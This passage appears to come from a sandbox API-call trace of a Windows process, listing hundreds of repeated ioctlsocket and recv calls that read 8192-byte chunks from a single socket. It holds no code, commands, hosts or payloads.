out: buf=0x1505f3a0*) returned 8192 [0019.369] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.369] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.369] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.370] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.370] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.370] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.371] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.371] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.374] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.374] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.375] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.375] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.376] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.376] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.377] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.377] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.378] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.378] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.379] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.379] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.379] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.380] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.380] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.380] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.381] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.381] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.382] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.382] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.383] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.383] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.384] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.384] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.385] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.385] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.386] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.386] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.386] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.387] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.387] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.387] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.392] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.392] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.393] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.393] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.394] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.394] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.395] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.395] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.396] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.396] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.397] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.397] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.397] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.398] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.398] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.398] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.399] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.399] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.400] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.400] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.401] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.401] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.402] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.402] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.403] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.403] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.404] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.404] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.404] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.405] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.405] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.405] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.406] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.406] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.407] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.407] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.409] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.409] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.409] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.410] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.410] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.410] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.411] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.411] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.413] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.413] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.414] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.414] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.415] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.415] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.416] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.416] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.417] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.417] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.418] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.418] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.418] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.418] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.419] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.419] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.420] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.420] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.421] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.421] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.431] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.431] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.432] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.432] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.433] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.433] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.433] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.433] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.434] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.434] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.435] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.435] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.436] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.436] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.437] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.437] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.438] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.438] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.438] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.439] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.439] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.439] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.440] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.440] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.441] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.441] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.442] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.442] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.443] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.443] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.444] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.444] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.444] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.445] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.445] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.445] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.446] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.446] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.447] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.447] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.448] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.448] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.449] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.449] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.450] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.450] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.451] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.451] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.451] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.451] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.452] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.452] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.453] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.453] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.454] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.454] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.455] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.455] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.456] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.456] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.457] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.457] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.457] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.458] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.458] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.458] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.459] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.459] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.460] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.460] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.461] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.461] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.462] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.462] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.463] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.463] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.464] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.464] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.465] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.465] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.466] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.466] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.466] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.467] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.467] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.467] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.468] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.468] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.469] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.469] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.470] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.470] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.471] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.471] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.472] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.472] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.472] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.473] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.473] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.473] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.474] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.474] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.475] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.475] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.476] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.476] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.477] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.477] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.478] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.478] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.479] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.479] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.480] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.480] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.481] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.481] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.482] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.482] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.482] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.482] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.483] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.483] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.484] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.484] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.485] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.485] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.486] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.486] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.514] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.514] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.515] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.515] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.516] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.516] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.517] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.517] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.518] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.518] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.518] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.518] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.519] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.519] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.520] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.520] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.521] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.521] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.522] ioctlsocket (in: s=0x290, cmd=1074030207, 